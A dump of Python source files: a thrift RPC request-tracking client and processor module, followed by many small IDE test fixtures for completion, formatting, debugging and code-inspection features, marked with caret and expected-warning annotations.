class RequestInfo(object):
def __init__(self, request_id, api, seq, client, server, status, start,
end, annotation, meta):
"""Used to store call info.
:request_id: used to identity a request
:api: api name
:seq: sequence number
:client: client name
:server: server name
:status: request status
:start: start timestamp
:end: end timestamp
:annotation: application-level key-value datas
"""
self.request_id = request_id
self.api = api
self.seq = seq
self.client = client
self.server = server
self.status = status
self.start = start
self.end = end
self.annotation = annotation
self.meta = meta
class TTrackedClient(TClient):
def __init__(self, tracker_handler, *args, **kwargs):
super(TTrackedClient, self).__init__(*args, **kwargs)
self.tracker = tracker_handler
self._upgraded = False
try:
self._negotiation()
self._upgraded = True
except TApplicationException as e:
if e.type != TApplicationException.UNKNOWN_METHOD:
raise
def _negotiation(self):
self._oprot.write_message_begin(track_method, TMessageType.CALL,
self._seqid)
args = track_thrift.UpgradeArgs()
self.tracker.init_handshake_info(args)
args.write(self._oprot)
self._oprot.write_message_end()
self._oprot.trans.flush()
api, msg_type, seqid = self._iprot.read_message_begin()
if msg_type == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.read_message_end()
raise x
else:
result = track_thrift.UpgradeReply()
result.read(self._iprot)
self._iprot.read_message_end()
def _send(self, _api, **kwargs):
if self._upgraded:
self._header = track_thrift.RequestHeader()
self.tracker.gen_header(self._header)
self._header.write(self._oprot)
self.send_start = int(time.time() * 1000)
super(TTrackedClient, self)._send(_api, **kwargs)
def _req(self, _api, *args, **kwargs):
if not self._upgraded:
return super(TTrackedClient, self)._req(_api, *args, **kwargs)
exception = None
status = False
try:
res = super(TTrackedClient, self)._req(_api, *args, **kwargs)
status = True
return res
except BaseException as e:
exception = e
raise
finally:
header_info = RequestInfo(
request_id=self._header.request_id,
seq=self._header.seq,
client=self.tracker.client,
server=self.tracker.server,
api=_api,
status=status,
start=self.send_start,
end=int(time.time() * 1000),
annotation=self.tracker.annotation,
meta=self._header.meta,
)
self.tracker.record(header_info, exception)
class TTrackedProcessor(TProcessor):
def __init__(self, tracker_handler, *args, **kwargs):
super(TTrackedProcessor, self).__init__(*args, **kwargs)
self.tracker = tracker_handler
self._upgraded = False
def process(self, iprot, oprot):
if not self._upgraded:
res = self._try_upgrade(iprot)
else:
request_header = track_thrift.RequestHeader()
request_header.read(iprot)
self.tracker.handle(request_header)
res = super(TTrackedProcessor, self).process_in(iprot)
self._do_process(iprot, oprot, *res)
def _try_upgrade(self, iprot):
api, msg_type, seqid = iprot.read_message_begin()
if msg_type == TMessageType.CALL and api == track_method:
self._upgraded = True
args = track_thrift.UpgradeArgs()
args.read(iprot)
self.tracker.handle_handshake_info(args)
result = track_thrift.UpgradeReply()
result.oneway = False
def call():
pass
iprot.read_message_end()
else:
result, call = self._process_in(api, iprot)
return api, seqid, result, call
def _process_in(self, api, iprot):
if api not in self._service.thrift_services:
iprot.skip(TType.STRUCT)
iprot.read_message_end()
return TApplicationException(
TApplicationException.UNKNOWN_METHOD), None
args = getattr(self._service, api + "_args")()
args.read(iprot)
iprot.read_message_end()
result = getattr(self._service, api + "_result")()
# convert kwargs to args
api_args = [args.thrift_spec[k][1]
for k in sorted(args.thrift_spec)]
def call():
return getattr(self._handler, api)(
*(args.__dict__[k] for k in api_args)
)
return result, call
def _do_process(self, iprot, oprot, api, seqid, result, call):
if isinstance(result, TApplicationException):
return self.send_exception(oprot, api, result, seqid)
try:
result.success = call()
except Exception as e:
# raise if api don't have throws
self.handle_exception(e, result)
if not result.oneway:
self.send_result(oprot, api, result, seqid)
from .tracker import TrackerBase, ConsoleTracker # noqa
```
#### File: testData/breadcrumbs/asyncSeveralWith.py
```python
async def foo():
async with open("file.txt"), open("file2.txt"):
print("a<caret>bc")
```
#### File: codeInsight/controlflow/trybreak.py
```python
def foo():
try:
for i in bar:
break
except:
raise Exception()
return 3
```
#### File: codeInsight/controlflow/typeannotations.py
```python
def foo(x: str) -> list:
expr = x
```
#### File: codeInsight/smartEnter/docTypeRType_after.py
```python
def foo(a):
"""
<caret>
@param a:
@type a:
@return:
@rtype:
"""
pass
def foo1():
"""
:return :
"""
```
#### File: testData/completion/chainedCall.py
```python
class X(object):
def testChain(self):
return X()
def g():
return X()
g().testChain().te<caret>
```
#### File: testData/completion/classMethod.py
```python
class B(object):
@classmethod
def xyzzy(cls):
pass
@classmethod
def class_method3(cls):
cls.x<caret>
```
#### File: testData/completion/classNameFromVarName.after.py
```python
class Product:
def doStuff(self): pass
def foo(product):
product.doStuff()
```
#### File: testData/completion/classNameFromVarNameChained.py
```python
class Product:
def doStuff(self): pass
class C:
def foo(self):
self.product.doS<caret>
```
#### File: testData/completion/classPrivateInMethod.py
```python
class Foo:
__BOO = 1
def foo(self):
z = self.__B<caret>
```
#### File: completion/doctest/forInDoctest.py
```python
__author__ = 'ktisha'
def bar():
"""
>>> fo<caret>
"""
```
#### File: testData/completion/dunderPrepareHonourInspectionSettings.py
```python
class A:
def __prep<caret>
class B:
@classmethod
def __prep<caret>
class C:
@decorator
def __prep<caret>
```
#### File: testData/completion/fieldReassignment.py
```python
class C1(object):
def method1(self):
pass
class Test(object):
def __init__(self, x):
self.x = x
self.x = C1()
self.x.meth<caret>
```
#### File: testData/completion/genericTypeInheritor.after.py
```python
from typing import Generic, TypeVar
T = TypeVar('T')
class BaseClass(Generic[T]):
def __init__(self, test: T):
self.test = test
base = BaseClass([1, 2, 3])
base.test
```
#### File: testData/completion/instanceFromInheritedCallAttr.py
```python
class Foo(object):
bar = True
class FooMakerAnc(object):
def __call__(self):
return Foo()
class FooMaker(FooMakerAnc):
pass
fm = FooMaker()
f3 = fm()
f3.b<caret>
```
#### File: testData/completion/localVarInDictKey.py
```python
ENCODINGS = {}
class C:
def foo(self):
if self.id[0] == 'T':
encoding = ord(self.rawData[0])
if 0 <= encoding < len(ENCODINGS):
value = self.rawData[1:].decode(ENCODINGS[enc<caret>])
```
#### File: testData/completion/matMul.after.py
```python
class C:
def __matmul__(self, other):
```
#### File: testData/completion/outerCompletionVariantDoesNotOverwriteClosestOne.after.py
```python
def abracadabra():
abracadabra = "str"
print(abracadabra)
```
#### File: testData/completion/protectedClassNames.after.py
```python
class A:
def _foo(self):
pass
A()._foo()
```
#### File: testData/completion/qualifiedAssignment.py
```python
def foo(a):
woo = []
a.words = {}
for x in w<caret>
```
#### File: testData/completion/slotsAsAllowedNames.after.py
```python
class A(object):
__slots__ = ['foo']
def __init__(self):
self.bar = 1
A().ba
class B:
__slots__ = ['foo']
def __init__(self):
self.bar = 1
B().bar
class C(object):
__slots__ = ['foo', '__dict__']
def __init__(self):
self.bar = 1
C().bar
```
#### File: testData/completion/superMethodWithCommentAnnotation.py
```python
from typing import Dict
class Parent:
def overridable_method(self,
param # type: str
): # type: (...) -> Dict[str, str]
pass
class Child(Parent):
def over<caret>
```
#### File: testData/completion/withType.py
```python
class Eggs(object):
def __enter__(self):
return u'foo'
def __exit__(self, exc_type, exc_val, exc_tb):
pass
class Spam(Eggs):
pass
def f():
with Spam() as spam:
spam.enc<caret>
```
#### File: testData/copyPaste/IndentTabIncrease.after.py
```python
print "Line 2"
class Test:
def __init__(self):
print "Line 2"
print "Line 1"
```
#### File: copyPaste/singleLine/IndentOnTopLevel.dst.py
```python
class C:
def foo(self):
x = 1
y = 2
<caret>
def foo():
pass
```
#### File: testData/debug/test_pyside2_3.py
```python
from PySide2 import QtCore
import sys
class Runnable(QtCore.QRunnable):
def run(self):
app = QtCore.QCoreApplication.instance()
for i in range(3):
print("ping %d" % i)
app.quit()
app = QtCore.QCoreApplication([])
runnable = Runnable()
QtCore.QThreadPool.globalInstance().start(runnable)
sys.exit(app.exec_())
```
#### File: testData/debug/test_set_next_statement.py
```python
def foo(a):
a *= 2
print(a)
x = 0
x += 1
x += 2
while x < 2:
x += 1
print(x)
foo(x)
print("x = %d" % x)
```
#### File: testData/debug/test_two_threads_resume.py
```python
from threading import Thread, RLock
from time import sleep
lock = RLock()
def foo():
sleep(1)
while True:
lock.acquire()
x = 12
sleep(0.01)
lock.release()
print("finished foo()", x)
threads = [Thread(target=foo, name="Thread1"),
Thread(target=foo, name="Thread2")]
for thread in threads:
thread.start()
```
#### File: testData/docstrings/googleDescriptionOfReturnValueOnNextLine.py
```python
def func():
"""
Returns:
int:
return value description
"""
```
#### File: testData/docstrings/googleNoClosingParenthesisAfterParamType.py
```python
def f(x, y):
"""
Args:
x (Foo
y (Bar : description
"""
```
#### File: testData/docstrings/numpyCombinedParamDeclarations.py
```python
def f(x, *args, y, **kwargs):
"""
Parameters
----------
x, *args, **kwargs, y: Any
description
"""
```
#### File: testData/dynamicTypes/1.py
```python
def foo(x):
return x
foo(1)
from time import sleep
sleep(5)
```
#### File: testData/editing/enterDocstringStubWhenClassDocstringBelow.after.py
```python
def f():
"""
Returns:
"""
class Class:
"""
bar
"""
```
#### File: testData/editing/enterDocstringStubWhenClassDocstringBelow.py
```python
def f():
"""<caret>
class Class:
"""
bar
"""
```
#### File: testData/editing/enterNoDocstringStubWhenCodeExampleInDocstring.py
```python
def f():
"""<caret>
Monospaced ``func`` and func
Example:
::
def func():
pass
class Class():
pass
"""
```
#### File: testData/editing/firstParamClassmethod.py
```python
class A(object):
@classmethod
def foo<caret>
```
#### File: testData/editing/firstParamMetaSimple.after.py
```python
class A(type):
def f(cls):
```
#### File: testData/editing/sectionIndentInsideGoogleDocStringCustomIndent.after.py
```python
def f(param):
"""
Args:
param<caret>
"""
```
#### File: testData/editing/spaceDocStringStubInFunction.after.py
```python
def func(x, y, z):
"""
:param x: <caret>
:param y:
:param z:
:return:
"""
```
#### File: testData/findUsages/GlobalUsages.py
```python
<caret>search_variable = 1
def function():
global search_variable
search_variable = 2
print(search_variable)
```
#### File: testData/findUsages/NonGlobalUsages.py
```python
<caret>a = 0
def b():
a = 1
print a
```
#### File: testData/findUsages/UnresolvedClassInit.py
```python
class <caret>B(C):
def __init__(self):
C.__init__(self)
```
#### File: testData/folding/customFolding.py
```python
<fold text='SupportStuff'>#region SupportStuff
class SupportClass(object):<fold text='...'>
pass</fold>
def supportFunction():<fold text='...'>
return</fold>
#endregion</fold>
class ImportantClass(object):<fold text='...'>
<fold text='Class body'>#region Class body
def f(self):<fold text='...'>
return 'hello world'</fold>
#endregion</fold>
pass</fold>
<fold text='VeryImportant'>#region VeryImportant
def importantFunction():<fold text='...'>
if (x > 0):<fold text='...'>
<fold text='Body'>#region Body
print "abc"
#endregion</fold></fold>
return</fold>
pass
#endregion</fold>
```
#### File: testData/formatter/continuationIndentInIndentingStatement.py
```python
if True \
or False:
pass
elif \
False:
pass
for i in \
range(1, 100):
pass
with open('file1') as file1, \
open('file2') as file2:
pass
class \
A(object):
pass
def \
foo():
pass
try:
pass
except \
AttributeError:
pass
while value \
in values: # <- missing continuation indent here
do_smth()
if (1 + x.
value()):
pass
```
#### File: testData/formatter/continuationIndent.py
```python
def long_function_name(
var_one, var_two, var_three,
var_four):
print(var_one)
```
#### File: testData/formatter/indentInGenerator_after.py
```python
def dbl():
return (
(a, a) for a in [])
```
#### File: testData/formatter/noBlankLinesAfterLocalImports.py
```python
from pprint import pprint
VAR = 42
def foo():
import sys
import ast, tokenize
pass
class C:
from textwrap import dedent
pass
import codecs as C
pass
```
#### File: Static/Lambda/file_1.py
```python
def func1(): pass
def func2(): pass
def func3(): pass
def func4(): pass
def func5(): pass
def func6(): pass
def func7(): pass
def func8(): pass
def func9(): pass
def func10(): pass
def func11(): pass
def func12(): pass
def func13(): pass
def func14(): pass
def func15(): pass
def func16(): pass
def func17(): pass
def func18(): pass
```
#### File: Static/Lambda/main.py
```python
from file_1 import *
def target_func(x=func1, y=func2(), z=lambda: func3, w=lambda: func4()):
p1 = lambda: func5()
p2 = lambda: func6
p1(), p2()
def inner(ix=func7, iy=func8(), iz=lambda: func9, iw=lambda: func10()):
func11()
ip = lambda: func12()
ip()
func13()
inner(func14, func15(), lambda: func16, lambda: func17())
return func18
target_<caret>func()
```
#### File: Static/NestedCall/file_1.py
```python
def func1(*args): pass
def func2(*args): pass
def func3(*args): pass
def func4(*args): pass
def func5(*args): pass
def func6(*args): pass
def func7(*args): pass
def func8(*args): pass
def func9(*args): pass
def func10(*args): pass
```
#### File: Static/OverriddenMethod/main.py
```python
from file_1 import A
class B(A):
def target_func(self, p):
p.another_func()
class C(object):
def func1(self, a):
a.target_func(A())
def func2(self):
a = A()
b = B()
a.target_func(b)
def bar1(a):
a.target_func(a)
def bar2(a, b):
atf, btf = a.target_func, b.target_func
bar1(A())
bar2(A(), B())
B().target_<caret>func(A())
```
#### File: testData/highlighting/returnOutsideOfFunction.py
```python
def <info descr="PY.FUNC_DEFINITION">foo</info>():
class <info descr="PY.CLASS_DEFINITION">C</info>:
<error descr="'return' outside of function">return 1</error>
```
#### File: testData/highlighting/spaceBetweenAtAndDecorator.py
```python
<info descr="PY.DECORATOR">@</info> <info descr="PY.DECORATOR">foo</info>
def <info descr="PY.FUNC_DEFINITION">f</info>():
pass
<info descr="PY.DECORATOR">@</info> <info descr="PY.DECORATOR">bar</info>(1, 2, 3)
def <info descr="PY.FUNC_DEFINITION">g</info>():
pass
```
#### File: testData/highlighting/yieldInDefaultValue.py
```python
def f(x=(<error descr="'yield' outside of function">yield 10</error>)):
return x
```
#### File: testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
```python
class Example1:
def __init__(self):
self.field1 = 1
class Example2(Example1):
def __init__(self): # Some valuable comment here
Example1.__init__(self)
```
#### File: testData/inspections/AddCallSuperCommentsInFunctionBodyPreserved_after.py
```python
class A:
def __init__(self):
pass
class B(A):
def __init__(self):
# comment #1
A.__init__(self)
# comment #2
print 42
```
#### File: testData/inspections/AddCallSuperOptionalAndRequiredParamsNameCollision_after.py
```python
class A:
def __init__(self, a):
pass
class B(A):
def __init__(self, a=1):
A.__init__(self, a)
```
#### File: testData/inspections/AddCallSuperRequiredKeywordOnlyParamAfterSingleStarInSuperInitIsMerged_after.py
```python
class A:
def __init__(self, *, a):
pass
class B(A):
def __init__(self, a):
super().__init__(a=a)
```
#### File: testData/inspections/AddCallSuperSingleStarParamInSuperInit_after.py
```python
class A:
def __init__(self, *, kw_only, optional_kw_only=None):
pass
class B(A):
def __init__(self, *, kw_only):
super().__init__(kw_only=kw_only)
```
#### File: testData/inspections/AddCallSuperSingleStarParamPreserved_after.py
```python
class NormalLR:
def __init__(self, *, tau=None):
self.tau = tau
class GradientLR(NormalLR):
def __init__(self, *, tau=None):
super().__init__(tau=tau)
```
#### File: testData/inspections/AddClassFromTypeComment.py
```python
def f():
x = None # type: <warning descr="Unresolved reference 'MyClass'">My<caret>Class</warning>
```
#### File: testData/inspections/AddClass.py
```python
class XyzzyTest:
def testSimple(self):
c = <caret><error descr="Unresolved reference 'Xyzzy'">Xyzzy</error>()
```
#### File: testData/inspections/AddFunctionFromFString.py
```python
class C:
def method(self):
print(f'{<error descr="Unresolved reference 'my_function'">my<caret>_function</error>()}')
```
#### File: testData/inspections/AddGlobalExistingStatement.py
```python
a = 1
def foo():
global b
print <caret><warning descr="Local variable 'a' might be referenced before assignment">a</warning>
a = 2
print a
foo()
```
#### File: testData/inspections/AddGlobalStatement_after.py
```python
a = 1
def foo():
global a
print a
a = 2
print a
foo()
```
#### File: testData/inspections/AddKwargsToNewMethodIncompatibleWithInit_after.py
```python
class C(object):
def __init__(self, x, y):
pass
def __new__(cls, **kwargs):
pass
```
#### File: testData/inspections/AddSelfFunction.py
```python
class A:
def get_a(self):
pass
def foo(self):
<error descr="Unresolved reference 'get_a'">g<caret>et_a</error>()
```
#### File: testData/inspections/ArgumentEqualDefault.py
```python
def foo(a, b = 345, c = 1):
pass
#PY-3261
foo(1,
<weak_warning descr="Argument equals to default parameter value">345<caret></weak_warning>, c=22)
```
#### File: testData/inspections/ChainedComparison6_after.py
```python
class A:
def foo(self):
if index >= self.current > index - self.history_length:
pass
```
#### File: testData/inspections/ChangeSignatureKeywordAndPositionalParameters_after.py
```python
def f(x, foo=1, bar='spam'):
pass
f(x, 42, bar='spam')
```
#### File: testData/inspections/DefaultArgumentEmptyList_after.py
```python
def bar(args=None):
if args is None:
args = []
```
#### File: testData/inspections/DocstringParams2_after.py
```python
def spam(ham, eggs): # <== PyCharm suggests to apply quickfix there
"""Docstring
@param ham:
@param eggs:
"""
pass
```
#### File: inspections/GoogleDocstringParametersInspection/test.py
```python
def foo1(a, b):
"""
Parameters:
a: foo
b: bar
"""
pass
def foo(a, <weak_warning descr="Missing parameter b in docstring">b</weak_warning>, <weak_warning descr="Missing parameter n in docstring">n</weak_warning>):
"""
Parameters:
a: foo
"""
pass
def foo():
"""
Parameters:
<weak_warning descr="Unexpected parameter a in docstring">a</weak_warning>: foo
"""
pass
def compare(a, b, *, key=None):
"""
Parameters:
a:
b:
key:
"""
pass
def foo(a, <weak_warning descr="Missing parameter c in docstring">c</weak_warning>):
"""
Parameters:
a:
<weak_warning descr="Unexpected parameter b in docstring">b</weak_warning>:
"""
pass
def varagrs_defined_without_stars(x, *args, y, **kwargs):
"""
Args:
x:
args:
y:
kwargs:
"""
def varagrs_dont_exist():
"""
Args:
*<weak_warning descr="Unexpected parameter args in docstring">args</weak_warning>:
**<weak_warning descr="Unexpected parameter kwargs in docstring">kwargs</weak_warning>:
"""
def varagrs_undefined(x, *args, y, **kwargs):
"""
Args:
x:
y:
"""
def no_parameters_declared(x, y):
"""
"""
```
#### File: testData/inspections/GoogleDocStringRemovePositionalVararg.py
```python
def f():
"""
Args:
*ar<caret>gs:
"""
```
#### File: inspections/InconsistentIndentation/test.py
```python
def foo():
<warning descr="Inconsistent indentation: mix of tabs and spaces"> </warning>print "foo"
def bar():
print "foo"
<warning descr="Inconsistent indentation: previous line used tabs, this line uses spaces"> </warning>print "bar"
"""
foo
bar
"""
print foo(
bar,
baz
)
```
#### File: testData/inspections/NumpyDocStringRemoveCombinedVarargParam_after.py
```python
def f():
"""
Parameters
==========
x, **kwargs
no one writes like that
"""
```
#### File: PyAbstractClassInspection/HiddenForAbstractSubclassWithABCSuperclass/abc.py
```python
class ABCMeta:
pass
class ABC(metaclass=ABCMeta):
"""Helper class that provides a standard way to create an ABC using
inheritance.
"""
pass
def abstractmethod(foo):
pass
```
#### File: quickFix/AddABCToSuperclasses/main_import.py
```python
import abc
class A1(abc.ABC):
@abc.abstractmethod
def m1(self):
pass
```
#### File: quickFix/AddImportedABCToSuperclasses/main.py
```python
from abc import ABC, abstractmethod
class A1(ABC):
@abstractmethod
def m1(self):
pass
class A<caret>2(A1):
pass
```
#### File: quickFix/SetABCMetaAsMetaclassPy3/main_import.py
```python
import abc
class A1(metaclass=abc.ABCMeta):
@abc.abstractmethod
def m1(self):
pass
```
#### File: quickFix/SetImportedABCMetaAsMetaclassPy3/main_after.py
```python
from abc import ABCMeta, abstractmethod
class A1(metaclass=ABCMeta):
@abstractmethod
def m1(self):
pass
class A2(A1, metaclass=ABCMeta):
pass
```
#### File: inspections/PyArgumentListInspection/decoratorsPy3K.py
```python
def deco(func, *args):
return func
@deco # <= Here is a false positive.
def myfunc(a, b):
print(a, b)
```
#### File: inspections/PyArgumentListInspection/instanceMethodAsLambda.py
```python
class TestFour():
is_super = lambda self: True if self.__class__.__name__ == 'TestFour' else False
def is_sub(self):
return not self.is_super() # pass: implicit 'self'
```
#### File: inspections/PyArgumentListInspection/multiResolveWhenAllResultsHaveUnmappedParameters.py
```python
class C1:
def foo(self, x):
return self
class C2:
def foo(self, x, y):
return self
def f():
"""
:rtype: C1 | C2
"""
pass
f().foo(<warning descr="Parameter(s) unfilledPossible callees:C1.foo(self: C1, x)C2.foo(self: C2, x, y)">)</warning>
```
#### File: inspections/PyArgumentListInspection/parameterWithDefaultAfterKeywordContainer.py
```python
def foo(**kwargs): pass
two = 0
kw = {}
foo(**kw, <error descr="Python version 2.7 does not allow keyword arguments after **expression">two=1</error>)
```
#### File: PyArgumentListInspection/TimetupleOnAssertedDate/datetime.py
```python
class date:
def timetuple(self):
pass
try:
from _datetime import *
except:
pass
```
#### File: inspections/PyArgumentListInspection/tuples.py
```python
ab = ((1, 2), (3, 4))
def f(*args):
return args
f(*ab) # pass
```
#### File: PyAsyncCallInspection/CorrectAsyncioCorCall/a.py
```python
import asyncio
@asyncio.coroutine
def foo():
return 24
@asyncio.coroutine
def baz():
yield from foo()
@asyncio.coroutine
def gen():
return foo()
@asyncio.coroutine
def wrap(co):
res = yield from co
return res
```
#### File: inspections/PyAttributeOutsideInitInspection/baseClassAttrs.py
```python
class Base(object):
class_field = 1
class Child(Base):
def f(self):
self.class_field = 3
```
#### File: inspections/PyAttributeOutsideInitInspection/fromSuperHierarchy.py
```python
__author__ = 'ktisha'
class Base(object):
def __init__(self):
self.my = 1
class Child(Base):
def f(self):
self.my = 1
```
#### File: inspections/PyAttributeOutsideInitInspection/propertyNotSetInInit.py
```python
class C(object):
def __init__(self, value):
pass
def getx(self):
return self._x
def setx(self, value):
<weak_warning descr="Instance attribute _x defined outside __init__">self._x</weak_warning> = value
x = property(getx, setx, doc="The 'x' property.")
```
#### File: inspections/PyCallingNonCallableInspection/afterModifierWrappingCall.py
```python
def f(x):
print(x)
class A:
fn = staticmethod(f)
def do(self, x):
self.fn(x)
```
#### File: inspections/PyCallingNonCallableInspection/callableClassDecorator.py
```python
class D(object):
def __init__(self, attribute, value):
pass
def __call__(self, cls):
return cls
@D("value", 42)
class C(object):
pass
a = C()
print(a.value)
```
#### File: inspections/PyCallingNonCallableInspection/explicitClassObjectTypeAnnotation.py
```python
from typing import Type
class MyClass(object):
pass
def func(param):
# type: (Type[MyClass]) -> MyClass
param()
```
#### File: inspections/PyCallingNonCallableInspection/genericClassObjectTypeAnnotation.py
```python
from typing import TypeVar, Type
class User:
pass
U = TypeVar('U', bound=User)
def new_user(user_class):
# type: (Type[U]) -> U
return user_class()
```
#### File: inspections/PyClassHasNoInitInspection/initInParentClass.py
```python
__author__ = 'ktisha'
class Base(object):
def __init__(self):
self.my = 1
class Child(Base): # <- Child class here should not be highlighted since
# it has init mehtod of Base class.
pass
```
#### File: inspections/PyClassHasNoInitInspection/new.py
```python
class Test(object):
def __new__(cls, foo): # False positive
self = super(Test, cls).__new__(cls)
self.foo = foo
return self
def bar(self):
return self.foo
t = Test(42)
print(t.bar())
```
#### File: inspections/PyDataclassInspection/attrsInitializersAndValidators.py
```python
import attr
@attr.s
class A:
x = attr.ib()
@x.default
def init_x1(self):
return 10
@x.validator
def check_x1(self, attribute, value):
pass
@attr.s
class A:
x = attr.ib()
@x.default
def init_x2<error descr="'init_x2' should take only 1 parameter">(self, attribute, value)</error>:
return 10
@x.validator
def check_x2<error descr="'check_x2' should take only 3 parameters">(self)</error>:
pass
```
#### File: inspections/PyDataclassInspection/helpersArgumentInStdInheritance.py
```python
import dataclasses
from typing import Type, Union
@dataclasses.dataclass
class Base:
pass
class A(Base):
pass
dataclasses.fields(A)
dataclasses.fields(A())
dataclasses.asdict(<warning descr="'dataclasses.asdict' method should be called on dataclass instances">A()</warning>)
dataclasses.astuple(A())
dataclasses.replace(A())
@dataclasses.dataclass
class B(Base):
pass
dataclasses.fields(B)
dataclasses.fields(B())
dataclasses.asdict(B())
dataclasses.astuple(B())
dataclasses.replace(B())
dataclasses.asdict(<warning descr="'dataclasses.asdict' method should be called on dataclass instances">B</warning>)
dataclasses.astuple(<warning descr="'dataclasses.astuple' method should be called on dataclass instances">B</warning>)
dataclasses.replace(<warning descr="'dataclasses.replace' method should be called on dataclass instances">B</warning>)
def unknown(p):
dataclasses.fields(p)
dataclasses.asdict(p)
dataclasses.astuple(p)
def structural(p):
print(len(p))
dataclasses.fields(p)
dataclasses.asdict(p)
dataclasses.astuple(p)
dataclasses.replace(p)
def union1(p: Union[A, B]):
dataclasses.fields(p)
dataclasses.asdict(p)
dataclasses.astuple(p)
dataclasses.replace(p)
def union2(p: Union[Type[A], Type[B]]):
dataclasses.fields(p)
dataclasses.asdict(<warning descr="'dataclasses.asdict' method should be called on dataclass instances">p</warning>)
dataclasses.astuple(<warning descr="'dataclasses.astuple' method should be called on dataclass instances">p</warning>)
dataclasses.replace(<warning descr="'dataclasses.replace' method should be called on dataclass instances">p</warning>)
```
#### File: inspections/PyDataclassInspection/wrongDunderPostInitSignatureInStdHierarchy.py
```python
import dataclasses
@dataclasses.dataclass
class A1:
a: int
b: dataclasses.InitVar[str]
def __post_init__(self, b: str):
print(f"b: {b}")
@dataclasses.dataclass
class B1(A1):
c: dataclasses.InitVar[int]
def __post_init__(self, b: str, c: int):
super(B1, self).__post_init__(b)
print(f"c: {c}")
@dataclasses.dataclass
class B2(A1):
c: dataclasses.InitVar[int]
def __post_init__<error descr="'__post_init__' should take all init-only variables (incl. inherited) in the same order as they are defined">(self, c: int)</error>:
print(f"c: {c}")
```
#### File: inspections/PyDataclassInspection/wrongDunderPostInitSignature.py
```python
import dataclasses
@dataclasses.dataclass
class A:
a: int
b: dataclasses.InitVar[str]
c: dataclasses.InitVar[bytes]
def __post_init__<error descr="'__post_init__' should take all init-only variables in the same order as they are defined">(self)</error>:
pass
@dataclasses.dataclass
class B:
a: int
b: dataclasses.InitVar[str]
c: dataclasses.InitVar[bytes]
def __post_init__<warning descr="'__post_init__' should take all init-only variables in the same order as they are defined">(self, c, b)</warning>:
pass
```
#### File: inspections/PyDictDuplicateKeysInspection/test.py
```python
dict = {<warning descr="Dictionary contains duplicate keys 'key_1'">key_1</warning> : 1, key_2: 2, <warning descr="Dictionary contains duplicate keys 'key_1'">key_1</warning> : 3}
dict = {'key_1' : 1, <warning descr="Dictionary contains duplicate keys 'key_2'">'key_2'</warning>: 2, <warning descr="Dictionary contains duplicate keys 'key_2'">'key_2'</warning> : 3}
a = {}
{'key_1' : 1, 'key_2': 2}
import random
def foo():
return random.random()
{foo(): 1, foo():2}
# PY-2511
dict = dict([(<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 666), (<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 123)])
dict = dict(((<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 666), (<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 123)))
dict = dict(((<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 666), ('k', 123)), <warning descr="Dictionary contains duplicate keys 'key'">key</warning>=4)
dict([('key', 666), ('ky', 123)])
# PY-27375
d = {<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 1, <warning descr="Dictionary contains duplicate keys 'a'">"a"</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>, 1), (<warning descr="Dictionary contains duplicate keys 'a'">"a"</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys '1'">1</warning>: 1, <warning descr="Dictionary contains duplicate keys '1'">1</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys '1'">1</warning>, 1), (<warning descr="Dictionary contains duplicate keys '1'">1</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys 'True'">True</warning>: 1, <warning descr="Dictionary contains duplicate keys 'True'">True</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys 'True'">True</warning>, 1), (<warning descr="Dictionary contains duplicate keys 'True'">True</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys 'None'">None</warning>: 1, <warning descr="Dictionary contains duplicate keys 'None'">None</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys 'None'">None</warning>, 1), (<warning descr="Dictionary contains duplicate keys 'None'">None</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys '11'">11</warning>: 1, <warning descr="Dictionary contains duplicate keys '11'">1_1</warning>: 1}
d = {<warning descr="Dictionary contains duplicate keys '11.1'">11.1</warning>: 1, <warning descr="Dictionary contains duplicate keys '11.1'">1_1.1</warning>: 1}
d = {<warning descr="Dictionary contains duplicate keys '11j'">11j</warning>: 1, <warning descr="Dictionary contains duplicate keys '11j'">1_1j</warning>: 1}
d = {11j: 1, 11: 1}
d = {<warning descr="Dictionary contains duplicate keys '0'">0j</warning>: 1, <warning descr="Dictionary contains duplicate keys '0'">0</warning>: 2}
{
<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 1,
<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 2,
<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 3,
}
# PY-30423
a = {
1: 2,
'1': 2,
}
```
#### File: PyDocstringInspection/src/test.py
```python
class A:
pass
def foo():
pass
class B:
""""""
pass
def bar():
""""""
pass
class C:
@property
def x(self):
return 42
@x.setter
def x(self, value):
pass
@x.deleter
def x(self):
pass
```
#### File: PyMethodFirstArgAssignmentInspection/src/first-args.py
```python
def self(): # ok
pass
self = 1 # ok
class A:
def foo(self, a):
(self, (a, b)) = 1, ((22, 23))
if 1:
a = {}
self = 23
for (self, a) in []:
pass
def boo():
self = 1
def moo(self):
def inner_moo():
self =1
def self():
pass
class self:
pass
@classmethod
def qoo(cls):
cls = 1
# no builtins detection -> can't test static methods :( where's mock Python SDK?
@staticmethod
def stat(first):
first = 1 # ok
```
#### File: inspections/PyMethodMayBeStaticInspection/attributeNamedSelf.py
```python
x = object()
x.self = 42
class C:
def <weak_warning descr="Method 'method' may be 'static'">method</weak_warning>(self):
print(x.self)
```
#### File: inspections/PyMethodMayBeStaticInspection/overwrittenMethod.py
```python
class A:
def f(self, a):
print "A"
class B(A):
def f(self, a):
print "B"
```
#### File: inspections/PyMethodMayBeStaticInspection/selfName.py
```python
__author__ = 'ktisha'
class A():
def my_method(my_inst):
my_inst.do_smth()
```
#### File: inspections/PyMethodMayBeStaticInspection/staticMethod.py
```python
__author__ = 'ktisha'
class Foo(object):
@staticmethod
def foo(param): # <-method here should not be highlighted
return "foo"
```
